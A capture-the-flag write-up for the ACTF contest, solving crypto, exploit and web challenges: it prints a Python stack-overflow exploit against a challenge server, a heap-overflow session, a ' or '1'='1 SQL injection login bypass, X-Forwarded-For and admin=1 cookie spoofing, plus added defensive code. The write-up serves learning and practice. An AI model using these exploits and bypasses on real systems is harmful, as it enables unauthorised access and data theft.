REVERSE 0    RE?

Where's the reversing challenge we were promised?
The challenge author hasn't had breakfast yet, what's the rush? Turn left on your way out and go do the Web challenges like a good kid, OK?

Solution:

This one is just being cute. "OK?" "OK!"

FLAG:

OK

CRYPTO 100    Ancient

The flag for this challenge is not wrapped in ACTF{}.
oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?

Solution:

nowadays, the world seems to turn faster than a couple of years ago. time has come to reflect that also in the phrack magazine. this is what the paper feed is about: you submit a paper, we review it and it gets published. no need to wait a month or two until you see your article in the next phrack issue, when the time has come, we'll decide to compile a new issue from the articles that have been submitted. that's basically it. and grab you flag here, cryptooosocoolamiright?
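As an added example (not part of the original write-up), the substitution table can be derived mechanically from the ciphertext/plaintext pair above and checked for consistency. The two strings are embedded as they appear on this page, with the consistent reading "phrack" for "ujbqzw".

```python
# Added example (not from the original write-up): derive the monoalphabetic
# substitution table from the challenge's known ciphertext/plaintext pair and
# verify that it is a consistent one-to-one letter mapping.
import string

# Both strings as given on the page (the pair the CRYPTO 100 solution relies on).
CIPHERTEXT = (
    "oivqmqgn, yja vibem naarn yi yxbo sqnyab yjqo q zixuea is gaqbn qdi. "
    "ykra jqn zira yi baseazy yjqy qeni ko yja ujbqzw rqdqhkoa. "
    "yjkn kn vjqy yja uquab saam kn qpixy: gix nxprky q uquab, "
    "va backav ky qom ky dayn uxpeknjam. oi oaam yi vqky q rioyj ib yvi "
    "xoyke gix naa gixb qbykzea ko yja oafy ujbqzw knnxa, vjao yja ykra jqn zira, "
    "va'ee mazkma yi zirukea q oav knnxa sbir yja qbykzean yjqy jqca paao nxprkyyam. "
    "yjqy'n pqnkzqeeg ky. qom dbqp gix seqd jaba, zbguyiiiniziieqrkbkdjy?"
)
PLAINTEXT = (
    "nowadays, the world seems to turn faster than a couple of years ago. "
    "time has come to reflect that also in the phrack magazine. "
    "this is what the paper feed is about: you submit a paper, "
    "we review it and it gets published. no need to wait a month or two "
    "until you see your article in the next phrack issue, when the time has come, "
    "we'll decide to compile a new issue from the articles that have been submitted. "
    "that's basically it. and grab you flag here, cryptooosocoolamiright?"
)


def derive_table(ciphertext, plaintext):
    """Build the cipher->plain letter map from a known-plaintext pair.

    Any contradiction (one cipher letter wanting two plain letters, or two
    cipher letters sharing one plain letter) means the text is not a simple
    substitution, or the assumed plaintext is wrong, so it raises."""
    if len(ciphertext) != len(plaintext):
        raise ValueError("ciphertext and plaintext lengths differ")
    table = {}
    for c, p in zip(ciphertext, plaintext):
        if not c.isalpha():
            if c != p:               # punctuation and spaces pass through untouched
                raise ValueError(f"non-letter {c!r} does not match {p!r}")
            continue
        if table.setdefault(c, p) != p:
            raise ValueError(f"{c!r} maps to both {table[c]!r} and {p!r}")
    if len(set(table.values())) != len(table):
        raise ValueError("two cipher letters map to the same plain letter")
    return table


def apply_table(table, text):
    """Decrypt text with the table; letters never seen in the pair are kept."""
    return "".join(table.get(ch, ch) for ch in text)


def unmapped_letters(table):
    """Cipher letters the known pair gives no evidence for."""
    return sorted(set(string.ascii_lowercase) - set(table))


if __name__ == "__main__":
    t = derive_table(CIPHERTEXT, PLAINTEXT)
    print(apply_table(t, CIPHERTEXT).rsplit(" ", 1)[-1])   # the flag word
    print("unmapped:", unmapped_letters(t))
```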

FLAG:

cryptooosocoolamiright

EXPLOIT 100    Appetizer

nc 218.2.197.236 2009
crypto200.tar.gz
Download link: http://ctf.zjuisa.org/downloads/pwn100.b0aaaddb42c9569ef8a2c4b7a2c9ee18

Solution:

Open it in IDA and decompile; the main and game functions come out as:

char *__cdecl main()
{
  char *result; // eax@1
  int v1; // [sp+1Ch] [bp-84h]@1
  int (*v2)(void); // [sp+9Ch] [bp-4h]@1
  v2 = 0;
  puts("== Welcome to PWWWWWWWWN world! ==\n");
  fflush(stdout);
  result = gets((char *)&v1);
  if ( v2 )
  {
    puts("You are on the right way.");
    fflush(stdout);
    result = (char *)v2();
  }
  return result;
}

int __cdecl game()
{
  int result; // eax@3
  FILE *stream; // [sp+1Ch] [bp-Ch]@1
  puts("Flag, gei ni yo");
  stream = fopen("/home/pwn/flag.txt", "r");
  while ( 1 )
  {
    result = fgetc(stream);
    if ( (_BYTE)result == -1 )
      break;
    putchar((char)result);
  }
  return result;
}

The game function prints the flag; its entry point is 0x0804855c.
In main, gets can overflow v1 and overwrite v2, which makes the if branch call v2. v1 is 128 bytes long, so append game's address after 128 bytes of filler. Note that the address must be written in reversed (little-endian) byte order (this tripped me up for ages...). In Python:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('218.2.197.236', 2009))
print sock.recv(1024)    # banner
# 128 bytes fill v1 up to v2, then game's address 0x0804855c in little-endian order
sock.send('\xFF' * 128 + '\x5c\x85\x04\x08' + '\n')
print sock.recv(1024)    # "You are on the right way." followed by the flag
sock.close()

FLAG:

ACTF{This_is_an_easy_one_you_have_a_long_w4y_2_go}

MISC 100  Social Engineering (free points)

Word is that the ACTF crowd all like hanging out on Tieba :)

Solution:

This one is free points: search Baidu Tieba for ACTF and you find the thread http://tieba.baidu.com/p/2960754182; copy the flag: ACTF{WEL0VECTF_SDOIFJDF}
Later a lot of people posted decoy threads in the ACTF forum to mislead others, sigh~

FLAG:

ACTF{WEL0VECTF_SDOIFJDF}

WEB 100    The Road to the Flag

Young man, fancy a go? http://218.2.197.236:2005/index.php

Solution:

Open http://218.2.197.236:2005/index.php; it shows a single line:

Can you GET the way to flag?

View the source:

<html>
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br>
Can you GET the way to flag?
</html>
<!--way = "H4ck_F0r_Fun!GoGoGo!" -->

There is a comment, way="H4ck_F0r_Fun!GoGoGo!". Try it as the flag; sure enough, it isn't.

Look at the sentence again: GET in capitals? Something is up; the HTTP GET method?

Try http://218.2.197.236:2005/index.php?way=H4ck_F0r_Fun!GoGoGo!

After submitting, it redirects to http://218.2.197.236:2005/322ad17d5b5fb56a810d9a295ffb5a8c.php

Again a single line, "flag can only access in local machine!", and nothing in the source. Only local access is allowed; my first thought was a reverse proxy, but how would you set that up? I was stuck here for a long time.

Later, following what the experts said, it is enough to add the HTTP request header X-Forwarded-For: 127.0.0.1; resubmit and the flag comes back.

>>> import httplib
>>> con=httplib.HTTPConnection('218.2.197.236',2005)
>>> con.request('GET','//322ad17d5b5fb56a810d9a295ffb5a8c.php','',{'X-Forwarded-For':'127.0.0.1'})
>>> res=con.getresponse()
>>> data=res.read()
>>> print data
<link rel="stylesheet" type="text/css" href="style.css">
Here is your flag: ACTF{I_love_H4ck_and_I_love_F4ck}<br><br><br><br><br><br><br><br>
flag can only access in local machine!
<br>
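Why the header worked, and the server-side fix, as an added example that is not part of the write-up: the page took X-Forwarded-For at face value as the client address. The hardened variant below honours the header only when the TCP peer is one of the operator's own proxies; the 10.0.0.0/8 proxy range and the 203.0.113.5 client address are constructed.

```python
# Added example (not from the write-up): the challenge's "local only" check
# read X-Forwarded-For as if it were the client address, which is why a
# spoofed "127.0.0.1" header passed it. The hardened variant only trusts the
# header when the TCP peer is one of our own proxies. Addresses are constructed.
import ipaddress


def client_ip_naive(peer_ip, headers):
    """What the challenge did: believe whatever the client wrote in the header."""
    xff = headers.get("X-Forwarded-For")
    return xff.split(",")[0].strip() if xff else peer_ip


def client_ip_trusted(peer_ip, headers, trusted_proxies):
    """Return the client address, honouring X-Forwarded-For only across hops
    we control.

    Each proxy appends the address it saw, so the rightmost entries were written
    by our proxies and everything left of them is an unverified claim."""
    nets = [ipaddress.ip_network(n) for n in trusted_proxies]

    def is_trusted(ip):
        try:
            return any(ipaddress.ip_address(ip) in net for net in nets)
        except ValueError:
            return False                      # not even an IP address

    if not is_trusted(peer_ip):
        return peer_ip                        # direct client: ignore the header
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
    hops = [h for h in hops if h]
    while hops and is_trusted(hops[-1]):      # strip our own proxies from the right
        hops.pop()
    if not hops:
        return peer_ip
    try:
        ipaddress.ip_address(hops[-1])
    except ValueError:
        return peer_ip                        # garbage in the header: fall back
    return hops[-1]


def is_local(ip):
    """The gate the flag page applied: loopback only."""
    return ipaddress.ip_address(ip).is_loopback
```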

FLAG:

ACTF{I_love_H4ck_and_I_love_F4ck}

CRYPTO 200  The Grudge of Not Getting a Ticket

Couldn't buy a TI4 ticket, life feels so bleak.. crypto200.tar.gz
Download link: http://ctf.zjuisa.org/downloads/crypto200.tar.gz.d656ad805747d212e4b49a74a0b4e8c7

Solution:

Download and extract; there are 4 files: encryptor.py, msg01, msg01.enc, msg02.enc

msg01 is a single sentence: Welcome to AAA capture the flag you folks

msg01.enc and msg02.enc are both gibberish

encryptor.py is the encryption program:

f = open('msg01', 'rb').read()
g = open('msg01.enc', 'wb')

key = 'key'
c = ''
t = chr(0)      # previous plaintext byte, 0 for the first position
i = 0

for p in f:
    # c[i] = p[i] + (key[i mod len(key)] XOR p[i-1]) + i**i, mod 256
    c = chr(( ord(p) + (ord(key[i % len(key)]) ^ ord(t)) + i**i ) & 0xff)
    t = p
    i += 1
    g.write(c)

g.close()

Run it and the encryption of msg01 does not match the given msg01.enc; from the code, that is presumably because the key is different, so the next job is finding the key. With the plaintext msg01 and the ciphertext msg01.enc both known, write the following:

f = open('msg01', 'rb').read()        # known plaintext
g = open('msg01.enc', 'rb').read()    # its ciphertext
k = open('key','wb')

key = ''
t = chr(0)
i = 0

for p in f:
    # invert the cipher: key[i] XOR p[i-1] = c[i] - i**i - p[i] (mod 256)
    key = chr((ord(g[i]) - i**i - ord(p)) & 0xff ^ ord(t))
    t = p
    i += 1
    k.write(key)
k.close()

Running it gives the key: DoNotTryToGuessWhatDoesD3AdCa7ThinkOfDoNo

From DoNo onwards it starts repeating from the beginning, so take the long part before it, DoNotTryToGuessWhatDoesD3AdCa7ThinkOf, as the final key and write the decryptor:

f = open('msg02', 'wb')
g = open('msg02.enc', 'rb').read()

key = 'DoNotTryToGuessWhatDoesD3AdCa7ThinkOf'
c = ''
t = chr(0)
i = 0

for p in g:
    # p[i] = c[i] - i**i - (key[i mod len(key)] XOR p[i-1]), mod 256
    c = chr(ord(p) - i**i - (ord(key[i % len(key)]) ^ ord(t)) & 0xff)
    t = c       # chain on the recovered plaintext byte
    i += 1
    f.write(c)
f.close()

Running it gives:

High demand! No matches...
Search again for these tickets (a fan may have let them go) or change quantity/ticket type.
Get This damn fl4g plz
ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}
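An added example, not the challenge's encryptor.py or the author's scripts: a Python 3 port of the same cipher with the three steps above as functions (encrypt, recover the key stream from the known msg01 pair, find its period, decrypt). The sample plaintext and key are the ones quoted above; the ciphertext is regenerated rather than read from the real file, and pow(i, i, 256) stands in for i**i, which is equal mod 256.

```python
# Added example (not the challenge's encryptor.py): a Python 3 port of the
# cipher with the write-up's three steps as functions. Sample values are the
# ones quoted in the write-up; the ciphertext is regenerated, not the real file.

def _pad(i: int) -> int:
    # i**i mod 256 without building huge integers; pow(0, 0, 256) == 1 == 0**0
    return pow(i, i, 256)


def encrypt(plain: bytes, key: bytes) -> bytes:
    out = bytearray()
    t = 0                                   # previous plaintext byte, 0 at start
    for i, p in enumerate(plain):
        out.append((p + (key[i % len(key)] ^ t) + _pad(i)) & 0xff)
        t = p
    return bytes(out)


def recover_keystream(plain: bytes, cipher: bytes) -> bytes:
    """Known-plaintext step: solve c = p + (k ^ t) + i**i (mod 256) for k."""
    if len(plain) != len(cipher):
        raise ValueError("need equal-length plaintext and ciphertext")
    out = bytearray()
    t = 0
    for i, (p, c) in enumerate(zip(plain, cipher)):
        out.append(((c - p - _pad(i)) & 0xff) ^ t)   # (k ^ t) is a byte, so exact
        t = p
    return bytes(out)


def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix that repeats to give the whole stream (the real key).

    Only meaningful when the known plaintext is longer than the key; here the
    41-byte msg01 exposes the 37-byte key plus a 4-byte repeat."""
    for n in range(1, len(stream) + 1):
        if all(stream[j] == stream[j % n] for j in range(len(stream))):
            return stream[:n]
    return stream


def decrypt(cipher: bytes, key: bytes) -> bytes:
    out = bytearray()
    t = 0                                   # previous *recovered* plaintext byte
    for i, c in enumerate(cipher):
        p = (c - (key[i % len(key)] ^ t) - _pad(i)) & 0xff
        out.append(p)
        t = p
    return bytes(out)


# Values from the write-up: the known plaintext and the key it recovered.
MSG01 = b"Welcome to AAA capture the flag you folks"
KEY = b"DoNotTryToGuessWhatDoesD3AdCa7ThinkOf"

if __name__ == "__main__":
    stream = recover_keystream(MSG01, encrypt(MSG01, KEY))
    print(stream)                           # ends in b'DoNo': the repeat begins
    print(shortest_period(stream))
```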

FLAG:

ACTF{why_can_not_I_buy_a_TI4_ticket_It_it_so_terrible!!!!!!!!!!}

EXPLOIT 200  Kill the Pig, Eat the Meat

nc 218.2.197.236 2010
crypto200.tar.gz
Download link: http://ctf.zjuisa.org/downloads/pwn200.676407435f65a98b11f7a3398491e04b

Solution:

Open the downloaded file in IDA: it is 64-bit, the decompiler plugin doesn't support it, so I had to dig through the assembly by hand, ugh...

Starting from main:

  1 .text:0000000000400A1A                 public main
  2 
  3 .text:0000000000400A1A main:
  4 
  5 .text:0000000000400A1A                 push    rbp
  6 
  7 .text:0000000000400A1B                 mov     rbp, rsp
  8 
  9 .text:0000000000400A1E                 sub     rsp, 0A0h
 10 
 11 .text:0000000000400A25                 mov     [rbp-94h], edi
 12 
 13 .text:0000000000400A2B                 mov     [rbp-0A0h], rsi
 14 
 15 .text:0000000000400A32                 mov     edi, offset a_________ ; " _____  _                       _      "...
 16 
 17 .text:0000000000400A37                 call    _puts
 18 
 19 .text:0000000000400A3C                 mov     edi, offset a___ ; "/  ___|| |                     | |    |"...
 20 
 21 .text:0000000000400A41                 call    _puts
 22 
 23 .text:0000000000400A46                 mov     edi, offset a______________ ; "\\ `--. | |  __ _  _   _   __ _ | |__  |"...
 24 
 25 .text:0000000000400A4B                 call    _puts
 26 
 27 .text:0000000000400A50                 mov     edi, offset a__________ ; " `--. \\| | / _` || | | | / _` || '_ \\ |"...
 28 
 29 .text:0000000000400A55                 call    _puts
 30 
 31 .text:0000000000400A5A                 mov     edi, offset a________ ; "/\\__/ /| || (_| || |_| || (_| || | | ||"...
 32 
 33 .text:0000000000400A5F                 call    _puts
 34 
 35 .text:0000000000400A64                 mov     edi, offset a_____________0 ; "\\____/ |_| \\__,_| \\__,_| \\__, ||_| |_| "...
 36 
 37 .text:0000000000400A69                 call    _puts
 38 
 39 .text:0000000000400A6E                 mov     edi, offset a__ ; "                          __/ |        "...
 40 
 41 .text:0000000000400A73                 call    _puts
 42 
 43 .text:0000000000400A78                 mov     edi, offset a____0 ; "                         |___/         "...
 44 
 45 .text:0000000000400A7D                 call    _puts
 46 
 47 .text:0000000000400A82                 mov     rax, cs:stdout@@GLIBC_2_2_5
 48 
 49 .text:0000000000400A89                 mov     rdi, rax
 50 
 51 .text:0000000000400A8C                 call    _fflush
 52 
 53 .text:0000000000400A91                 jmp     short loc_400A94
 54 
 55 .text:0000000000400A93 ; ---------------------------------------------------------------------------
 56 
 57 .text:0000000000400A93
 58 
 59 .text:0000000000400A93 loc_400A93:                             ; CODE XREF: .text:0000000000400BE2j
 60 
 61 .text:0000000000400A93                                         ; .text:0000000000400C50j ...
 62 
 63 .text:0000000000400A93                 nop
 64 
 65 .text:0000000000400A94
 66 
 67 .text:0000000000400A94 loc_400A94:                             ; CODE XREF: .text:0000000000400A91j
 68 
 69 .text:0000000000400A94                 mov     rdx, cs:service
 70 
 71 .text:0000000000400A9B                 mov     rax, cs:auth
 72 
 73 .text:0000000000400AA2                 mov     rsi, rax
 74 
 75 .text:0000000000400AA5                 mov     edi, offset aKillpigPFeedpi ; "[ killPig = %p, feedPig = %p ]\n"
 76 
 77 .text:0000000000400AAA                 mov     eax, 0
 78 
 79 .text:0000000000400AAF                 call    _printf
 80 
 81 .text:0000000000400AB4                 mov     rax, cs:stdout@@GLIBC_2_2_5
 82 
 83 .text:0000000000400ABB                 mov     rdi, rax
 84 
 85 .text:0000000000400ABE                 call    _fflush
 86 
 87 .text:0000000000400AC3                 mov     rdx, cs:stdin@@GLIBC_2_2_5
 88 
 89 .text:0000000000400ACA                 lea     rax, [rbp-90h]
 90 
 91 .text:0000000000400AD1                 mov     esi, 80h
 92 
 93 .text:0000000000400AD6                 mov     rdi, rax
 94 
 95 .text:0000000000400AD9                 call    _fgets
 96 
 97 .text:0000000000400ADE                 test    rax, rax
 98 
 99 .text:0000000000400AE1                 jz      loc_400C5A      ; X
100 
101 .text:0000000000400AE7                 lea     rax, [rbp-90h]
102 
103 .text:0000000000400AEE                 mov     edx, 8
104 
105 .text:0000000000400AF3                 mov     esi, offset aKillpig ; "killPig "
106 
107 .text:0000000000400AF8                 mov     rdi, rax
108 
109 .text:0000000000400AFB                 call    _strncmp
110 
111 .text:0000000000400B00                 test    eax, eax
112 
113 .text:0000000000400B02                 jnz     short loc_400B64
114 
115 .text:0000000000400B04                 mov     edi, 8
116 
117 .text:0000000000400B09                 call    _malloc
118 
119 .text:0000000000400B0E                 mov     cs:auth, rax
120 
121 .text:0000000000400B15                 mov     rax, cs:auth
122 
123 .text:0000000000400B1C                 mov     edx, 8
124 
125 .text:0000000000400B21                 mov     esi, 0
126 
127 .text:0000000000400B26                 mov     rdi, rax
128 
129 .text:0000000000400B29                 call    _memset
130 
131 .text:0000000000400B2E                 lea     rax, [rbp-90h]
132 
133 .text:0000000000400B35                 add     rax, 8
134 
135 .text:0000000000400B39                 mov     rdi, rax
136 
137 .text:0000000000400B3C                 call    _strlen
138 
139 .text:0000000000400B41                 cmp     rax, 1Eh
140 
141 .text:0000000000400B45                 ja      short loc_400B64
142 
143 .text:0000000000400B47                 mov     rax, cs:auth
144 
145 .text:0000000000400B4E                 lea     rdx, [rbp-90h]
146 
147 .text:0000000000400B55                 add     rdx, 8
148 
149 .text:0000000000400B59                 mov     rsi, rdx
150 
151 .text:0000000000400B5C                 mov     rdi, rax
152 
153 .text:0000000000400B5F                 call    _strcpy
154 
155 .text:0000000000400B64
156 
157 .text:0000000000400B64 loc_400B64:                             ; CODE XREF: .text:0000000000400B02j
158 
159 .text:0000000000400B64                                         ; .text:0000000000400B45j
160 
161 .text:0000000000400B64                 lea     rax, [rbp-90h]
162 
163 .text:0000000000400B6B                 mov     edx, 5
164 
165 .text:0000000000400B70                 mov     esi, offset aReset ; "reset"
166 
167 .text:0000000000400B75                 mov     rdi, rax
168 
169 .text:0000000000400B78                 call    _strncmp
170 
171 .text:0000000000400B7D                 test    eax, eax
172 
173 .text:0000000000400B7F                 jnz     short loc_400B90
174 
175 .text:0000000000400B81                 mov     rax, cs:auth
176 
177 .text:0000000000400B88                 mov     rdi, rax
178 
179 .text:0000000000400B8B                 call    _free
180 
181 .text:0000000000400B90
182 
183 .text:0000000000400B90 loc_400B90:                             ; CODE XREF: .text:0000000000400B7Fj
184 
185 .text:0000000000400B90                 lea     rax, [rbp-90h]
186 
187 .text:0000000000400B97                 mov     edx, 7
188 
189 .text:0000000000400B9C                 mov     esi, offset aFeedpig ; "feedPig"
190 
191 .text:0000000000400BA1                 mov     rdi, rax
192 
193 .text:0000000000400BA4                 call    _strncmp
194 
195 .text:0000000000400BA9                 test    eax, eax
196 
197 .text:0000000000400BAB                 jnz     short loc_400BC7
198 
199 .text:0000000000400BAD                 lea     rax, [rbp-90h]
200 
201 .text:0000000000400BB4                 add     rax, 8
202 
203 .text:0000000000400BB8                 mov     rdi, rax
204 
205 .text:0000000000400BBB                 call    _strdup
206 
207 .text:0000000000400BC0                 mov     cs:service, rax
208 
209 .text:0000000000400BC7
210 
211 .text:0000000000400BC7 loc_400BC7:                             ; CODE XREF: .text:0000000000400BABj
212 
213 .text:0000000000400BC7                 lea     rax, [rbp-90h]
214 
215 .text:0000000000400BCE                 mov     edx, 5
216 
217 .text:0000000000400BD3                 mov     esi, offset aEatit ; "eatIt"
218 
219 .text:0000000000400BD8                 mov     rdi, rax
220 
221 .text:0000000000400BDB                 call    _strncmp
222 
223 .text:0000000000400BE0                 test    eax, eax
224 
225 .text:0000000000400BE2                 jnz     loc_400A93
226 
227 .text:0000000000400BE8                 mov     rax, cs:auth
228 
229 .text:0000000000400BEF                 mov     eax, [rax+20h]
230 
231 .text:0000000000400BF2                 test    eax, eax
232 
233 .text:0000000000400BF4                 jz      short loc_400C37
234 
235 .text:0000000000400BF6                 mov     edi, offset aFlagGeiNiYooo ; "Flag, gei ni yooo"
236 
237 .text:0000000000400BFB                 call    _puts
238 
239 .text:0000000000400C00                 mov     esi, offset aR  ; "r"
240 
241 .text:0000000000400C05                 mov     edi, offset aHomePwnFlag_tx ; "/home/pwn/flag.txt"
242 
243 .text:0000000000400C0A                 call    _fopen
244 
245 .text:0000000000400C0F                 mov     [rbp-8], rax
246 
247 .text:0000000000400C13                 jmp     short loc_400C20
248 
249 .text:0000000000400C15 ; ---------------------------------------------------------------------------
250 
251 .text:0000000000400C15
252 
253 .text:0000000000400C15 loc_400C15:                             ; CODE XREF: .text:0000000000400C33j
254 
255 .text:0000000000400C15                 movsx   eax, byte ptr [rbp-9]
256 
257 .text:0000000000400C19                 mov     edi, eax
258 
259 .text:0000000000400C1B                 call    _putchar
260 
261 .text:0000000000400C20
262 
263 .text:0000000000400C20 loc_400C20:                             ; CODE XREF: .text:0000000000400C13j
264 
265 .text:0000000000400C20                 mov     rax, [rbp-8]
266 
267 .text:0000000000400C24                 mov     rdi, rax
268 
269 .text:0000000000400C27                 call    _fgetc
270 
271 .text:0000000000400C2C                 mov     [rbp-9], al
272 
273 .text:0000000000400C2F                 cmp     byte ptr [rbp-9], 0FFh
274 
275 .text:0000000000400C33                 jnz     short loc_400C15
276 
277 .text:0000000000400C35                 jmp     short loc_400C55
278 
279 .text:0000000000400C37 ; ---------------------------------------------------------------------------
280 
281 .text:0000000000400C37
282 
283 .text:0000000000400C37 loc_400C37:                             ; CODE XREF: .text:0000000000400BF4j
284 
285 .text:0000000000400C37                 mov     edi, offset aWhoAreYouZhuto ; "Who are you! zhutou bu shi ni xiang chi"...
286 
287 .text:0000000000400C3C                 call    _puts
288 
289 .text:0000000000400C41                 mov     rax, cs:stdout@@GLIBC_2_2_5
290 
291 .text:0000000000400C48                 mov     rdi, rax
292 
293 .text:0000000000400C4B                 call    _fflush

The overall logic compares the input string in turn against "killPig " (with a trailing space), "reset", "feedPig" and "eatIt" and jumps to the matching operation.

Line 233 of the listing (0x400BF4) has the key jump: jz short loc_400C37. eax must be non-zero for the flag-printing code below it to run.

eax is loaded from auth+20h, where auth is a pointer kept in the .bss section. That memory is allocated and zeroed by submitting "killPig "; then submitting "feedPig" followed by an overly long string makes the service allocation overflow into auth (in the session below, feedPig = 0x2170030 = killPig + 0x20, so the strdup'd string lands exactly where auth+20h is read); finally submitting "eatIt" prints the flag:

C:\nc11nt>nc 218.2.197.236 2010
_____  _                       _      _                _

/  ___|| |                     | |    | |              | |

\ `--. | |  __ _  _   _   __ _ | |__  | |_   ___  _ __ | |__    ___   _   _  ___
   ___
 `--. \| | / _` || | | | / _` || '_ \ | __| / _ \| '__|| '_ \  / _ \ | | | |/ __
| / _ \
/\__/ /| || (_| || |_| || (_| || | | || |_ |  __/| |   | | | || (_) || |_| |\__
\|  __/
\____/ |_| \__,_| \__,_| \__, ||_| |_| \__| \___||_|   |_| |_| \___/  \__,_||___
/ \___|
                          __/ |

                         |___/

[ killPig = (nil), feedPig = (nil) ]
killPig
[ killPig = 0x2170010, feedPig = (nil) ]
feedPigaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaa
[ killPig = 0x2170010, feedPig = 0x2170030 ]
[ killPig = 0x2170010, feedPig = 0x2170030 ]
eatIt
Flag, gei ni yooo
ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}
[ killPig = 0x2170010, feedPig = 0x2170030 ]

FLAG:

ACTF{Why_not_try_zio_to_Pwwwwwwwwwn_Everything}

WEB 200  Annoying Admin

The FLAG is in admin's hands! http://218.2.197.236:2005/web200/index.php

Solution:

Open http://218.2.197.236:2005/web200/index.php: it is a login page; the standard injection ' or '1'='1 gets through.

It says the flag is in ae6032eeeb5cedc1555940983435335b.php

Open http://218.2.197.236:2005/web200/ae6032eeeb5cedc1555940983435335b.php

One line: wrong place man! key is not here.

Are you kidding me! A decoy, as expected.

Capture the raw response with Wireshark:
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Sun, 06 Apr 2014 14:09:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.10
realkeyisin: beda47ac34562108ee149767c61cb0ec.php
7d
<link rel="stylesheet" type="text/css" href="style.css">
<br><br><br><br><br><br><br><br>
wrong place man! key is not here.

There is a realkeyisin: beda47ac34562108ee149767c61cb0ec.php header

Open http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php

One line: You find it! But only admin can see the flag...can you see it?

Admin again, whatever that is supposed to mean; at this point I was lost. I heard that adding Cookie: admin=1 is all it takes?

GET http://218.2.197.236:2005//web200/beda47ac34562108ee149767c61cb0ec.php HTTP/1.1
Host: 218.2.197.236:2005
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: admin=1

This one was pure luck.

>>> import httplib
>>> con=httplib.HTTPConnection('218.2.197.236',2005)
>>> con.request('GET','/web200/beda47ac34562108ee149767c61cb0ec.php','',{'Cookie':'admin=1'})
>>> res=con.getresponse()
>>> data=res.read()
>>> print data
<link rel="stylesheet" type="text/css" href="style.css">

<br><br><br><br><br><br><br><br>

You find it! But only admin can see the flag...can you see it?<br>

flag:ACTF{I_donot_need_sex_life_fxxks_me_everyday}
>>> 
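Why admin=1 worked, and the usual fix, as an added example that is not the challenge's code: the role lived in a cookie the client can edit freely. Below, the cookie carries the role and an expiry under an HMAC, so an edited or forged value verifies as anonymous; the server key is a constructed placeholder.

```python
# Added example (not the challenge's code): "admin=1" was a bare, client-editable
# claim. Keep the role in a cookie that carries an HMAC and an expiry instead,
# so an edited or forged value falls back to anonymous. Key is a placeholder.
import hashlib
import hmac

SERVER_KEY = b"placeholder-server-secret-load-from-config"   # assumption


def make_session_cookie(role: str, expires_at: int, key: bytes = SERVER_KEY) -> str:
    """Cookie value 'role|expiry.hexmac'; only the server holds the key."""
    payload = f"{role}|{int(expires_at)}"
    mac = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{mac}"


def role_from_cookie(value, now: int, key: bytes = SERVER_KEY) -> str:
    """Return the role only if the MAC verifies and it has not expired."""
    if not value or "." not in value:
        return "anonymous"
    payload, _, mac = value.rpartition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):   # constant-time
        return "anonymous"                         # forged or edited
    role, _, exp = payload.partition("|")
    if not exp.isdigit() or int(exp) < now:
        return "anonymous"                         # expired
    return role


def is_admin_vulnerable(cookies: dict) -> bool:
    """The challenge's effective check: a value anyone can set in the browser."""
    return cookies.get("admin") == "1"


def is_admin_fixed(cookies: dict, now: int) -> bool:
    return role_from_cookie(cookies.get("session"), now) == "admin"
```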

FLAG:

ACTF{I_donot_need_sex_life_fxxks_me_everyday}

Well, my level only gets me through the 100- and 200-point challenges; for the rest I'll sit back and wait for the experts' write-ups.

MISC 300  S4ndb0x

http://218.2.197.236:2015

MISC 300  Packet (Pig) Capture

All the traffic from Pighead's phone in the study room has been captured! See what interesting things are in it?
Link: http://pan.baidu.com/s/1ntrzThB Password: cbf2

MISC 300  Find the Bug (Pwn the Pig)

Pighead likes oschina and got an Android client from Dead Cat, but Dead Cat had ulterior motives and left a backdoor in it. Word is that Pighead arranged a date with a girl over oschina private messages; now you get a chance to plant a trojan, so see whether you can steal Pighead's hook-up messages. You have to get past the antivirus, of course.
http://218.2.197.236:2007

WEB 300  Meow Meow Meow Meow

Admin Xiao Lu set up a server, but it seems to have rather a lot of holes.
http://218.2.197.236:2001/index.html

CRYPTO 400  Big Brother aay's Secret

Big Brother aay gave you a mysterious file; do with it what you will: flag.rar
Download link: http://ctf.zjuisa.org/downloads/flag.rar.f4cc03f0637d6ac68e5fa230a65a4071

MISC 400  Sponsor

Everybody come and look at the sponsor! hidden.png
Download link: http://ctf.zjuisa.org/downloads/hidden.png.dc1ae8d8f43c52dd53cce50b7b253593

WEB 400  Meatball-chan

If you didn't solve web300 there isn't much hope for this one; do you think you're adorable Meatball-chan? ( つ•̀ω•́)つ
(Does Meatball-chan even count as a hint?)
(Neither web300 nor web400 requires a scanner)
